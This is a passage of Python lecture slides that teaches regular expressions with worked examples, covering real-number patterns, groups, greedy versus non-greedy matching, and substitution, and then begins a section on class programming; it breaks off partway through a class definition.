    t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05
    
    2 instead of 12 (iterations) is extracted
    (why? see later)
    Regular expressions constitute a powerful tool, but you need to develop understanding and experience
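    The failure is easy to reproduce. The sketch below applies the loose regex and the earlier, more structured one to the problematic line; the variable names are chosen for the illustration. In the loose version the .* in front of (\d+) grabs as many characters as it can, including the 1 in 12, and leaves only the last digit for the group.

```python
import re

line = "t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05"

loose = r"t=(.*)\s+a:.*(\d+).*=(.*)"
structured = r"t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)"

loose_iterations = re.search(loose, line).group(2)
structured_iterations = re.search(structured, line).group(2)

print(loose_iterations)        # only the last digit of 12
print(structured_iterations)   # the whole integer
```

    Requiring whitespace on both sides of (\d+) forces the group to start at the beginning of the integer.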



    List of special regex characters

    .       # any single character except a newline
    ^       # the beginning of the line or string
    $       # the end of the line or string
    *       # zero or more of the preceding character (or group)
    +       # one or more of the preceding character (or group)
    ?       # zero or one of the preceding character (or group)
    
    [A-Z]   # matches any single upper case letter
    [abc]   # matches either a or b or c
    [^b]    # does not match b
    [^a-z]  # does not match lower case letters
    



    Context is important

    .*    # any sequence of characters (except newline)
    [.*]  # the characters . and *
    
    ^no   # the string 'no' at the beginning of a line
    [^no] # neither n nor o
    
    A-Z   # the 3-character string 'A-Z' (A, minus, Z)
    [A-Z] # one of the chars A, B, C, ..., X, Y, or Z
    



    More weird syntax...

    The OR operator:
    (eg|le)gs  # matches eggs or legs
    
    Short forms of common expressions:
    \n     # a newline
    \t     # a tab
    \w     # any alphanumeric (word) character
           # the same as [a-zA-Z0-9_]
    \W     # any non-word character
           # the same as [^a-zA-Z0-9_]
    \d     # any digit, same as [0-9]
    \D     # any non-digit, same as [^0-9]
    \s     # any whitespace character: space,
           # tab, newline, etc
    \S     # any non-whitespace character
    \b     # a word boundary, outside [] only
    \B     # no word boundary
    



    Quoting special characters

    \.     # a dot
    \|     # vertical bar
    \[     # an open square bracket
    \)     # a closing parenthesis
    \*     # an asterisk
    \^     # a hat
    \/     # a slash
    \\     # a backslash
    \{     # a curly brace
    \?     # a question mark
    



    GUI for regex testing

    src/tools/regexdemo.py:

    The part of the string that matches the regex is highlighted



    Regex for a real number

    Different ways of writing real numbers:
    -3, 42.9873, 1.23E+1, 1.2300E+01, 1.23e+01
    Three basic forms:

    integer: -3
    decimal notation: 42.9873, .376, 3.
    scientific notation: 1.23E+1, 1.2300E+01, 1.23e+01, 1e1



    A simple regex

    Could just collect the legal characters in the three notations:
    [0-9.Ee\-+]+
    
    Downside: this matches text like
    12-24
    24.-
    --E1--
    +++++
    
    How can we define precise regular expressions for the three notations?



    Decimal notation regex

    Regex for decimal notation:
    -?\d*\.\d+
    
    # or equivalently (\d is [0-9])
    -?[0-9]*\.[0-9]+
    
    Problem: this regex does not match '3.'
    The fix
    -?\d*\.\d*
    
    is ok but matches text like '-.' and (much worse!) '.'
    Trying it on
    'some text. 4. is a number.'
    
    gives a match for the first period!



    Fix of decimal notation regex

    We need a digit before OR after the dot
    The fix:
    -?(\d*\.\d+|\d+\.\d*)   
    
    A more compact version (just "OR-ing" numbers without digits after the dot):
    -?(\d*\.\d+|\d+\.)
    



    Combining regular expressions

    Make a regex for integer or decimal notation:
    (integer OR decimal notation)
    
    using the OR operator and parentheses:
    -?(\d+|(\d+\.\d*|\d*\.\d+))
    
    Problem: 22.432 gives a match for 22
    (i.e., just digits? yes - 22 - match!)



    Check the order in combinations!

    Remedy: test for the most complicated pattern first
    (decimal notation OR integer)
    
    -?((\d+\.\d*|\d*\.\d+)|\d+)
    
    Modularize the regex:
    real_in = r'\d+'
    real_dn = r'(\d+\.\d*|\d*\.\d+)'
    real = '-?(' + real_dn + '|' + real_in + ')'
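    The effect of the ordering can be verified directly. The sketch compares the integer-first regex from the previous slide with the modularized decimal-first version; the test strings are chosen for the illustration.

```python
import re

# Integer tested first: stops as soon as the digits 22 are matched.
integer_first = r'-?(\d+|(\d+\.\d*|\d*\.\d+))'

# Decimal notation tested first (modularized as on the slide).
real_in = r'\d+'
real_dn = r'(\d+\.\d*|\d*\.\d+)'
real = '-?(' + real_dn + '|' + real_in + ')'

text = 'value: 22.432'
wrong = re.search(integer_first, text).group(0)
right = re.search(real, text).group(0)
negative_int = re.search(real, 'n = -3 items').group(0)

print(wrong)
print(right)
print(negative_int)
```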
    



    Scientific notation regex (1)

    Write a regex for numbers in scientific notation
    Typical text: 1.27635E+01, -1.27635e+1
    Regular expression:
    -?\d\.\d+[Ee][+\-]\d\d?
    
    = optional minus, one digit, dot, at least one digit, E or e, plus or minus, one digit, optional digit



    Scientific notation regex (2)

    Problem: 1e+00 and 1e1 are not handled
    Remedy: optional dot, zero or more digits behind the dot, optional sign in the exponent, one or more digits in the exponent (1e001):
    -?\d\.?\d*[Ee][+\-]?\d+
    



    Making the regex more compact

    A pattern for integer or decimal notation:
    -?((\d+\.\d*|\d*\.\d+)|\d+)
    
    Can get rid of an OR by allowing the dot and the digits behind the dot to be optional:
    -?(\d+(\.\d*)?|\d*\.\d+)
    
    Such a number, followed by an optional exponent (a la e+02), makes up a general real number (!)
    -?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?
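    A quick check of the general real number regex against the forms listed earlier. The helper is_real is invented for the illustration; it anchors the regex at the end of the string with $ so that the whole text must be a number.

```python
import re

real = r'-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?'

def is_real(text):
    """Return True if the complete text is a real number."""
    # re.match anchors at the start, the added $ at the end.
    return re.match(real + '$', text) is not None

valid = ['-3', '42.9873', '.376', '3.',
         '1.23E+1', '1.2300E+01', '1.23e+01', '1e1']
invalid = ['12-24', '24.-', '--E1--', '+++++', '.', '-.']

accepted = [s for s in valid + invalid if is_real(s)]
print(accepted)
```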
    



    A more readable regex

    Scientific OR decimal OR integer notation:
    -?(\d\.?\d*[Ee][+\-]?\d+|(\d+\.\d*|\d*\.\d+)|\d+)
    
    or better (modularized):
    real_in = r'\d+'
    real_dn = r'(\d+\.\d*|\d*\.\d+)'
    real_sn = r'(\d\.?\d*[Ee][+\-]?\d+)'
    real = '-?(' + real_sn + '|' + real_dn + '|' + real_in + ')'
    
    Note: first test on the most complicated regex in OR expressions



    Groups (in introductory example)

    Enclose parts of a regex in () to extract the parts:
    pattern = r"t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)"
    # groups:     (  )          (   )      (  )
    
    This defines three groups (t, iterations, eps)
    In Python code:
    match = re.search(pattern, line)
    if match:
        time = float(match.group(1))
        iter = int  (match.group(2))
        eps  = float(match.group(3))
    
    The complete match is group 0 (here: the whole line)



    Regex for an interval

    Aim: extract lower and upper limits of an interval:
    [ -3.14E+00, 29.6524]
    
    Structure: bracket, real number, comma, real number, bracket, with embedded whitespace



    Easy start: integer limits

    Regex for real numbers is a bit complicated
    Simpler: integer limits
    pattern = r'\[\d+,\d+\]'
    
    but this must be fixed for embedded white space or negative numbers a la
    [ -3   , 29  ]
    
    Remedy:
    pattern = r'\[\s*-?\d+\s*,\s*-?\d+\s*\]'
    
    Introduce groups to extract lower and upper limit:
    pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
    



    Testing groups

    In an interactive Python shell we write
    >>> import re
    >>> pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
    >>> s = "here is an interval: [ -3, 100] ..."
    >>> m = re.search(pattern, s)
    >>> m.group(0)
    '[ -3, 100]'
    >>> m.group(1)
    '-3'
    >>> m.group(2)
    '100'
    >>> m.groups()   # tuple of all groups
    ('-3', '100')
    



    Named groups

    Many groups? inserting a group in the middle changes other group numbers...
    Groups can be given logical names instead
    Standard group notation for interval:
    # apply integer limits for simplicity: [int,int]
    \[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]
    
    Using named groups:
    \[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\]
    
    Extract groups by their names:
    match.group('lower')
    match.group('upper')
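    A runnable version of the named-group extraction, applied to the test string from the previous slide. The call to groupdict is an addition for the illustration; it returns all named groups as a dictionary.

```python
import re

interval = r'\[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\]'

match = re.search(interval, 'here is an interval: [ -3, 100] ...')
lower = int(match.group('lower'))
upper = int(match.group('upper'))
limits = match.groupdict()   # all named groups as a dictionary

print(lower)
print(upper)
```

    Named groups can still be reached by number (match.group(1), match.group(2)), so existing code keeps working when names are added.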
    



    Regex for an interval; real limits

    Interval with general real numbers:
    real_short = r'\s*(-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*'
    interval = r"\[" + real_short + "," + real_short + r"\]"
    
    Example:
    >>> m = re.search(interval, '[-100,2.0e-1]')
    >>> m.groups()
    ('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
    
    i.e., lots of (nested) groups; only group 1 and 5 are of interest



    Handle nested groups with named groups

    Real limits, previous regex resulted in the groups
    ('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
    
    Downside: many groups, difficult to count right
    Remedy 1: use named groups for the outer left and outer right groups:
    real1 = \
     r"\s*(?P<lower>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
    real2 = \
     r"\s*(?P<upper>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
    interval = r"\[" + real1 + "," + real2 + r"\]"
    ...
    match = re.search(interval, some_text)
    if match:
        lower_limit = float(match.group('lower'))
        upper_limit = float(match.group('upper'))
    



    Simplify regex to avoid nested groups

    Remedy 2: reduce the use of groups
    Avoid nested OR expressions (recall our first tries):
    real_in = r"-?\d+"
    real_sn = r"-?\d\.?\d*[Ee][+\-]\d+"
    real_dn = r"-?\d*\.\d*"
    real = r"\s*(" + real_sn + "|" + real_dn + "|" + real_in + r")\s*"
    interval = r"\[" + real + "," + real + r"\]"
    

  • Cost: (slightly) less general and safe regex



    Extracting multiple matches (1)

    re.findall finds all matches (re.search finds the first)
    >>> r = r"\d+\.\d*"
    >>> s = "3.29 is a number, 4.2 and 0.5 too"
    >>> re.findall(r,s)
    ['3.29', '4.2', '0.5']
    
    Application to the interval example:
    lower, upper = re.findall(real, '[-3, 9.87E+02]')
    # real: regex for real number with only one group!
    



    Extracting multiple matches (2)

    If the regex contains groups, re.findall returns the matches of all groups - this might be confusing!
    >>> r = r"(\d+)\.\d*"
    >>> s = "3.29 is a number, 4.2 and 0.5 too"
    >>> re.findall(r,s)
    ['3', '4', '0']
    
    Application to the interval example:
    >>> real_short = r"([+\-]?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)"
    >>> # recall: real_short contains many nested groups!
    >>> g = re.findall(real_short, '[-3, 9.87E+02]')
    >>> g
    [('-3', '3', '', ''), ('9.87E+02', '9.87', '.87', 'E+02')]
    >>> limits = [ float(g1) for g1, g2, g3, g4 in g ]
    >>> limits
    [-3.0, 987.0]
    



    Making a regex simpler

    Regex is often a question of structure and context
    Simpler regex for extracting interval limits:
    \[(.*),(.*)\]
    
    It works!
    >>> l = re.search(r'\[(.*),(.*)\]', 
                      ' [-3.2E+01,0.11  ]').groups()
    >>> l
    ('-3.2E+01', '0.11  ')
    
    # transform to real numbers:
    >>> r = [float(x) for x in l]
    >>> r
    [-32.0, 0.11]
    



    Failure of a simple regex (1)

    Let us test the simple regex on a more complicated text:
    >>> l = re.search(r'\[(.*),(.*)\]', \
        ' [-3.2E+01,0.11  ] and [-4,8]').groups()
    >>> l
    ('-3.2E+01,0.11  ] and [-4', '8')
    
    Regular expressions can surprise you...!
    Regular expressions are greedy: they attempt to find the longest possible match, here from [ to the last (!) comma
    We want a shortest possible match, up to the first comma, i.e., a non-greedy match
    Add a ? to get a non-greedy match:
    \[(.*?),(.*?)\]
    
    Now l becomes
    ('-3.2E+01', '0.11  ')
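    Greedy and non-greedy matching can be compared side by side on the text from this slide. The conversion to floats with re.findall is an addition for the illustration.

```python
import re

text = ' [-3.2E+01,0.11  ] and [-4,8]'

greedy = re.search(r'\[(.*),(.*)\]', text).groups()
non_greedy = re.search(r'\[(.*?),(.*?)\]', text).groups()

# With the non-greedy regex, re.findall picks up both intervals.
all_intervals = [(float(lower), float(upper))
                 for lower, upper in re.findall(r'\[(.*?),(.*?)\]', text)]

print(greedy)
print(non_greedy)
print(all_intervals)
```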
    



    Failure of a simple regex (2)

    Instead of using a non-greedy match, we can use
    \[([^,]*),([^\]]*)\]
    
    Note: only the first match (here the first interval) is found by re.search; use re.findall to find all



    Failure of a simple regex (3)

    The simple regexes
    \[([^,]*),([^\]]*)\]
    \[(.*?),(.*?)\]
    
    are not fool-proof:
    >>> l = re.search(r'\[([^,]*),([^\]]*)\]', 
                      ' [e.g., exception]').groups()
    >>> l
    ('e.g.', ' exception')
    
    100 percent reliable fix: use the detailed real number regex inside the parentheses
    The simple regex is ok for personal code



    Application example

    Suppose we, in an input file to a simulator, can specify a grid using this syntax:
    domain=[0,1]x[0,2] indices=[1:21]x[0:100]
    domain=[0,15] indices=[1:61]
    domain=[0,1]x[0,1]x[0,1] indices=[0:10]x[0:10]x[0:20]
    
    Can we easily extract domain and indices limits and store them in variables?



    Extracting the limits

    Specify a regex for an interval with real number limits
    Use re.findall to extract multiple intervals
    Problems: many nested groups due to complicated real number specifications
    Various remedies: as in the interval examples, see fdmgrid.py
    The bottom line: a very simple regex, utilizing the surrounding structure, works well



    Utilizing the surrounding structure

    We can get away with a simple regex, because of the surrounding structure of the text:
    indices = r"\[([^:,]*):([^\]]*)\]"  # works
    domain  = r"\[([^,]*),([^\]]*)\]"   # works
    
    Note: these ones do not work:
    indices = r"\[([^:]*):([^\]]*)\]" 
    indices = r"\[(.*?):(.*?)\]" 
    
    They match too much:
    domain=[0,1]x[0,2] indices=[1:21]x[1:101]
           [.....................:
    
    we need to exclude commas (i.e. left bracket, anything but comma or colon, colon, anything but right bracket)
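    A sketch of how the two working regexes can be used with re.findall to parse one line of the grid specification. The function parse_grid and its return format are assumptions made for the illustration and need not agree with what fdmgrid.py does.

```python
import re

domain_regex = r"\[([^,]*),([^\]]*)\]"
indices_regex = r"\[([^:,]*):([^\]]*)\]"

def parse_grid(line):
    """Return (domain, indices) as lists of (lower, upper) tuples."""
    domain = [(float(lower), float(upper))
              for lower, upper in re.findall(domain_regex, line)]
    indices = [(int(lower), int(upper))
               for lower, upper in re.findall(indices_regex, line)]
    return domain, indices

line = 'domain=[0,1]x[0,2] indices=[1:21]x[0:100]'
domain, indices = parse_grid(line)
print(domain)
print(indices)

# The regex without the comma exclusion matches far too much:
too_much = re.search(r"\[([^:]*):([^\]]*)\]", line).group(1)
print(too_much)
```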



    Splitting text

    Split a string into words:
    line.split(splitstring)
    # or
    string.split(line, splitstring)
    
    Split wrt a regular expression:
    >>> files = "case1.ps, case2.ps,    case3.ps"
    >>> import re
    >>> re.split(r",\s*", files)
    ['case1.ps', 'case2.ps', 'case3.ps']
    
    >>> files.split(", ")  # a straight string split is undesired
    ['case1.ps', 'case2.ps', '   case3.ps']
    >>> re.split(r"\s+", "some    words   in a text")
    ['some', 'words', 'in', 'a', 'text']
    
    Notice the effect of this:
    >>> re.split(r" ", "some    words   in a text")
    ['some', '', '', '', 'words', '', '',  'in', 'a', 'text']
    



    Pattern-matching modifiers (1)

    ...also called flags in Python regex documentation
    Check if a user has written "yes" as answer:
    if re.search('yes', answer):
    
    Problem: "YES" is not recognized; try a fix
    if re.search(r'(yes|YES)', answer):
    
    Should allow "Yes" and "YEs" too...
    if re.search(r'[yY][eE][sS]', answer):
    
    This is hard to read and case-insensitive matches occur frequently - there must be a better way!



    Pattern-matching modifiers (2)

    if re.search('yes', answer,  re.IGNORECASE):
    # pattern-matching modifier: re.IGNORECASE
    # now we get a match for 'yes', 'YES', 'Yes' ...
    
    # ignore case:
    re.I  or  re.IGNORECASE
    
    # let ^ and $ match at the beginning and 
    # end of every line:
    re.M  or  re.MULTILINE
    
    # allow comments and white space:                            
    re.X  or  re.VERBOSE
    
    # let . (dot) match newline too:
    re.S  or  re.DOTALL
    
    # let e.g. \w match special chars (å, æ, ...):
    re.L  or  re.LOCALE
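    Three of the modifiers in action. The test strings are invented for the illustration.

```python
import re

# re.IGNORECASE: accept any mix of upper and lower case.
answers = ['yes', 'YES', 'Yes', 'no']
accepted = [a for a in answers if re.search('yes', a, re.IGNORECASE)]

text = "first line\nsecond line"

# re.MULTILINE: ^ matches at the beginning of every line.
line_starts = re.findall(r'^\w+', text, re.MULTILINE)

# re.DOTALL: the dot matches newline too.
without_dotall = re.search(r'first.*second', text)
with_dotall = re.search(r'first.*second', text, re.DOTALL)

print(accepted)
print(line_starts)
```

    Several modifiers can be combined with the | operator, e.g. re.IGNORECASE | re.DOTALL.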
    



    Comments in a regex

    The re.X or re.VERBOSE modifier is very useful for inserting comments explaining various parts of a regular expression
    Example:
    # real number in scientific notation:
    real_sn = r"""
    -?              # optional minus
    \d\.\d+          # a number like 1.4098
    [Ee][+\-]\d\d?  # exponent, E-03, e-3, E+12
    """
    
    match = re.search(real_sn, 'text with a=1.92E-04 ',
                      re.VERBOSE)
    
    # or when using compile:
    c = re.compile(real_sn, re.VERBOSE)
    match = c.search('text with a=1.9672E-04 ')
    



    Substitution

    Substitute float by double:
    # filestr contains a file as a string
    filestr = re.sub('float', 'double', filestr)
    
    In general:
    re.sub(pattern, replacement, str)
    
    If there are groups in pattern, these are accessed by
    \1     \2     \3     ...
    \g<1>  \g<2>  \g<3>  ...
    
    \g<lower>  \g<upper> ...
    
    in replacement
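    A small sketch of the three ways of referring to groups in the replacement string. The input line and the patterns are invented for this illustration; the group names lower and upper are defined with the (?P<name>...) syntax.

```python
import re

line = "xmin=0 xmax=4"

# numbered groups: swap name and value
swapped = re.sub(r'(\w+)=(\d+)', r'\2=\1', line)
# swapped is '0=xmin 4=xmax'

# \g<2> means the same as \2, but stays unambiguous when a digit follows
padded = re.sub(r'(\w+)=(\d+)', r'\g<1>=\g<2>0', line)
# padded is 'xmin=00 xmax=40'

# named groups are referred to as \g<name>
interval = re.sub(r'xmin=(?P<lower>\d+) xmax=(?P<upper>\d+)',
                  r'[\g<lower>, \g<upper>]', line)
# interval is '[0, 4]'
```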



    Example: strip away C-style comments

    C-style comments could be nice to have in scripts for commenting out large portions of the code:
    /*
    while 1:
        line = file.readline()
        ...
    ...
    */
    
    Write a script that strips C-style comments away
    Idea: match comment, substitute by an empty string



    Trying to do something simple

    Suggested regex for C-style comments:
    comment = r'/\*.*\*/'
    
    # read file into string filestr
    filestr = re.sub(comment, '', filestr)
    
    i.e., match everything between /* and */
    Bad: . does not match newline
    Fix: re.S or re.DOTALL modifier makes . match newline:
    comment = r'/\*.*\*/'
    c_comment = re.compile(comment, re.DOTALL)
    filestr = c_comment.sub('', filestr)
    
    OK? No!



    Testing the C-comment regex (1)

    Test file:
    /********************************************/
    /* File myheader.h                          */
    /********************************************/
    
    #include <stuff.h>  // useful stuff
    
    class MyClass
    {
      /* int r; */  float q;
      // here goes the rest class declaration
    }
    
    /* LOG HISTORY of this file:
     * $ Log: somefile,v $
     * Revision 1.2  2000/07/25 09:01:40  hpl
     * update
     *
     * Revision 1.1.1.1  2000/03/29 07:46:07  hpl
     * register new files
     *
    */
    



    Testing the C-comment regex (2)

    The regex
    /\*.*\*/  with re.DOTALL (re.S)
    
    matches the whole file (i.e., the whole file is stripped away!)
    Why? a regex is by default greedy, it tries the longest possible match, here the whole file
    A question mark makes the regex non-greedy:
    /\*.*?\*/
    



    Testing the C-comment regex (3)

    The non-greedy version works
    OK? Yes - the job is done, almost...
    const char* str ="/* this is a comment */"
    
    gets stripped away to an empty string...
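    The difference between the greedy and the non-greedy regex, and the remaining problem with comment-like text inside string literals, can be checked on a short piece of code. This is only a sketch; the C snippet in the string code is made up.

```python
import re

code = ('/* first */ int a; /* second */ int b;\n'
        'const char* s = "/* not a comment */";')

greedy = re.compile(r'/\*.*\*/', re.DOTALL)
nongreedy = re.compile(r'/\*.*?\*/', re.DOTALL)

# greedy: one match from the first /* to the very last */
greedy_result = greedy.sub('', code)
# greedy_result is '";'

# non-greedy: each comment is matched separately, but the
# contents of the string literal are removed as well
nongreedy_result = nongreedy.sub('', code)
# nongreedy_result is ' int a;  int b;\nconst char* s = "";'
```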



    Substitution example

    Suppose you have written a C library which has many users
    One day you decide that the function
    void superLibFunc(char* method, float x)
    
    would be more natural to use if its arguments were swapped:
    void superLibFunc(float x, char* method)
    
    All users of your library must then update their application codes - can you automate?



    Substitution with backreferences

    You want to locate all strings of the form
    superLibFunc(arg1, arg2)
    
    and transform them to
    superLibFunc(arg2, arg1)
    
    Let arg1 and arg2 be groups in the regex for the superLibFunc calls
    Write out
    superLibFunc(\2, \1)
    
    # recall: \1 is group 1, \2 is group 2 in a re.sub command
    



    Regex for the function calls (1)

    Basic structure of the regex of calls:
    superLibFunc\s*\(\s*arg1\s*,\s*arg2\s*\)
    
    but what should the arg1 and arg2 patterns look like?
    Natural start: arg1 and arg2 are valid C variable names
    arg = r"[A-Za-z_0-9]+"
    
    Fix; digits are not allowed as the first character:
    arg = "[A-Za-z_][A-Za-z_0-9]*"
    



    Regex for the function calls (2)

    The regex
    arg = "[A-Za-z_][A-Za-z_0-9]*"
    
    works well for calls with variables, but we can call superLibFunc with numbers too:
    superLibFunc ("relaxation", 1.432E-02);
    
    Possible fix:
    arg = r"[A-Za-z0-9_.\-+\"]+"
    
    but the disadvantage is that arg now also matches
    .+-32skj  3.ejks
    



    Constructing a precise regex (1)

    Since arg2 is a float we can make a precise regex: legal C variable name OR legal real variable format
    arg2 = r"([A-Za-z_][A-Za-z_0-9]*|" + real + \
           r"|float\s+[A-Za-z_][A-Za-z_0-9]*" + ")"
    
    where real is our regex for formatted real numbers:
    real_in = r"-?\d+"
    real_sn = r"-?\d\.\d+[Ee][+\-]\d\d?"
    real_dn = r"-?\d*\.\d+"
    real = r"\s*("+ real_sn +"|"+ real_dn +"|"+ real_in +r")\s*"
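    A quick check of the real regex, as a sketch: the helper is_real and the test strings are assumptions made for this illustration. The helper appends $ so that the whole text must be one number.

```python
import re

real_in = r"-?\d+"
real_sn = r"-?\d\.\d+[Ee][+\-]\d\d?"
real_dn = r"-?\d*\.\d+"
real = r"\s*(" + real_sn + "|" + real_dn + "|" + real_in + r")\s*"

def is_real(text):
    """Return True if the whole text is one formatted real number."""
    return re.match(real + r"$", text) is not None

accepted = [s for s in ("1.432E-02", "-.5", "42", " 3.14 ") if is_real(s)]
# the strings that the loose regex for arg matched are now rejected
rejected = [s for s in (".+-32skj", "3.ejks", "1.2.3") if not is_real(s)]
```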
    



    Constructing a precise regex (2)

    We can now treat variables and numbers in calls
    Another problem: should swap arguments in a user's definition of the function:
    void superLibFunc(char* method, float x)
    
    to 
    
    void superLibFunc(float x, char* method)
    
    Note: the argument names (x and method) can also be omitted!
    Calls and declarations of superLibFunc can be written on more than one line and with embedded C comments!
    Giving up?



    A simple regex may be sufficient

    Instead of trying to make a precise regex, let us make a very simple one:
    arg = '.+'   # any text
    
    "Any text" may be precise enough since we have the surrounding structure,
    superLibFunc\s*\(\s*arg\s*,\s*arg\s*\)
    
    and assume that a C compiler has checked that arg is a valid C code text in this context



    Refining the simple regex

    A problem with .+ appears in lines with more than one call:
    superLibFunc(a,x);  superLibFunc(ppp,qqq);
    
    We get a match for the first argument equal to
    a,x);  superLibFunc(ppp
    
    Remedy: non-greedy regex (see later) or
    arg = r"[^,]+"
    
    This one matches multi-line calls/declarations, also with embedded comments (.+ does not match newline unless the re.S modifier is used)



    Swapping of the arguments

    Central code statements:
    arg = r"[^,]+"
    call = r"superLibFunc\s*\(\s*(%s),\s*(%s)\)" % (arg,arg)
    
    # load file into filestr
    
    # substitute:
    filestr = re.sub(call, r"superLibFunc(\2, \1)", filestr)
    
    # write out file again
    fileobject.write(filestr)
    
    Files: src/py/intro/swap1.py



    Testing the code

    Test text:
    superLibFunc(a,x);  superLibFunc(qqq,ppp);
    superLibFunc ( method1, method2 );
    superLibFunc(3method /* illegal name! */, method2 ) ;  
    superLibFunc(  _method1,method_2) ;
    superLibFunc (
                  method1 /* the first method we have */ ,
              super_method4 /* a special method that
                                   deserves a two-line comment... */
                 ) ;
    
    The simple regex successfully transforms this into
    superLibFunc(x, a);  superLibFunc(ppp, qqq);
    superLibFunc(method2 , method1);
    superLibFunc(method2 , 3method /* illegal name! */) ;  
    superLibFunc(method_2, _method1) ;
    superLibFunc(super_method4 /* a special method that
                                   deserves a two-line comment... */
                 , method1 /* the first method we have */ ) ;
    
    Notice how powerful a small regex can be!!
    Downside: cannot handle a function call as argument



    Shortcomings

    The simple regex
    [^,]+
    
    breaks down for comments with comma(s) and function calls as arguments, e.g.,
    superLibFunc(m1, a /* large, random number */);
    superLibFunc(m1, generate(c, q2));
    
    The regex will match the longest possible string ending with a comma, in the first line
    m1, a /* large,
    
    but then there are no more commas ...
    A complete solution should parse the C code
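    The shortcomings can be reproduced directly with the regex from the swapping code. In this sketch the helper function swap is introduced only for illustration. Note that the two problematic calls give no match at all, so they are silently left unswapped.

```python
import re

arg = r"[^,]+"
call = r"superLibFunc\s*\(\s*(%s),\s*(%s)\)" % (arg, arg)

def swap(text):
    """Swap the two arguments in all superLibFunc calls in text."""
    return re.sub(call, r"superLibFunc(\2, \1)", text)

# plain arguments are swapped as intended
ok = swap("superLibFunc(a,x);  superLibFunc(qqq,ppp);")
# ok is 'superLibFunc(x, a);  superLibFunc(ppp, qqq);'

# an extra comma inside a comment or a nested call prevents a match
with_comment = "superLibFunc(m1, a /* large, random number */);"
with_call = "superLibFunc(m1, generate(c, q2));"
comment_result = swap(with_comment)   # unchanged
call_result = swap(with_call)         # unchanged
```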



    More easy-to-read regex

    The superLibFunc call with comments and named groups:
    call = re.compile(r"""
         superLibFunc  # name of function to match 
         \s*           # possible whitespace
         \(            # parenthesis before argument list
         \s*           # possible whitespace
         (?P<arg1>%s)  # first argument plus optional whitespace
         ,             # comma between the arguments
         \s*           # possible whitespace
         (?P<arg2>%s)  # second argument plus optional whitespace
         \)            # closing parenthesis
         """ % (arg,arg), re.VERBOSE)
    
    # the substitution command:
    filestr = call.sub(r"superLibFunc(\g<arg2>, \g<arg1>)",
                       filestr)
    
    Files: src/py/intro/swap2.py



    Example

    Goal: remove C++/Java comments from source codes
    Load a source code file into a string:
    filestr = open(somefile, 'r').read()
    
    # note: newlines are a part of filestr
    
    Substitute comments // some text... by an empty string:
    filestr = re.sub(r'//.*', '', filestr)
    
    Note: . (dot) does not match newline; if it did, we would need to say
    filestr = re.sub(r'//[^\n]*', '', filestr)
    



    Failure of a simple regex

    How will the substitution
    filestr = re.sub(r'//[^\n]*', '', filestr)
    
    treat a line like
    const char* heading = "------------//------------";
    
    ???
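    The question is easily settled by trying the substitution on that line. A minimal sketch:

```python
import re

line = 'const char* heading = "------------//------------";'

# the regex cannot know that // is inside a string literal
stripped = re.sub(r'//[^\n]*', '', line)
# stripped is 'const char* heading = "------------'
```

    The rest of the string literal, the closing quote and the semicolon are removed, so the resulting C++ code no longer compiles.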



    Regex debugging (1)

    The following useful function demonstrates how to extract matches, groups etc. for examination:
    def debugregex(pattern, str):
        s = "does '" + pattern + "' match '" + str + "'?\n"
        match = re.search(pattern, str)
        if match:
            s += str[:match.start()] + "[" + \
                 str[match.start():match.end()] + \
                 "]" + str[match.end():]
            if len(match.groups()) > 0:
                for i in range(len(match.groups())):
                    s += "\ngroup %d: [%s]" % \
                         (i+1,match.groups()[i])
        else:
            s += "No match"
        return s
    



    Regex debugging (2)

    Example on usage:
    >>> print debugregex(r"(\d+\.\d*)",
                         "a= 51.243 and b =1.45")
    
    does '(\d+\.\d*)' match 'a= 51.243 and b =1.45'?
    a= [51.243] and b =1.45
    group 1: [51.243]
    





    Class programming in Python




    Contents

    Intro to the class syntax
    Special attributes
    Special methods
    Classic classes, new-style classes
    Static data, static functions
    Properties
    About scope



    More info

    Ch. 8.6 in the course book
    Python Tutorial
    Python Reference Manual (special methods in 3.3)
    Python in a Nutshell (OOP chapter - recommended!)



    Classes in Python

    Similar class concept as in Java and C++
    All functions are virtual
    No private/protected variables
    (the effect can be "simulated")
    Single and multiple inheritance
    Everything in Python is an object (an instance of some class or type)
    Class programming is easier and faster than in C++ and Java (?)



    The basics of Python classes

    Declare a base class MyBase:
    class MyBase:
    
        def __init__(self,i,j):  # constructor
            self.i = i; self.j = j
    
        def write(self):         # member function
            print 'MyBase: i=',self.i,'j=',self.j
    
    self is a reference to this object
    Data members are prefixed by self:
    self.i, self.j
    All functions take self as first argument in the declaration, but not in the call
    inst1 = MyBase(6,9); inst1.write()
    



    Implementing a subclass

    Class MySub is a subclass of MyBase:
    class MySub(MyBase):
    
        def __init__(self,i,j,k):  # constructor
            MyBase.__init__(self,i,j)
            self.k = k
    
        def write(self):
            print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
    
    Example:
    # this function works with any object that has a write func:
    def write(v): v.write()
    
    # make a MySub instance
    i = MySub(7,8,9)
    
    write(i)   # will call MySub's write
    



    Comment on object-orientation

    Consider
    def write(v): 
        v.write()
    
    write(i)   # i is MySub instance
    
    In C++/Java we would declare v as a MyBase reference and rely on i.write() as calling the virtual function write in MySub
    The same works in Python, but we do not need inheritance and virtual functions here: v.write() will work for any object v that has a callable attribute write that takes no arguments
    Object-orientation in C++/Java for parameterizing types is not needed in Python since variables are not declared with types
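    A sketch of this point: the class Logger below is hypothetical and unrelated to MyBase, yet the same write function accepts instances of both. The write methods return strings instead of printing, only to make the result easy to inspect.

```python
class MyBase:
    def __init__(self, i, j):
        self.i = i; self.j = j

    def write(self):
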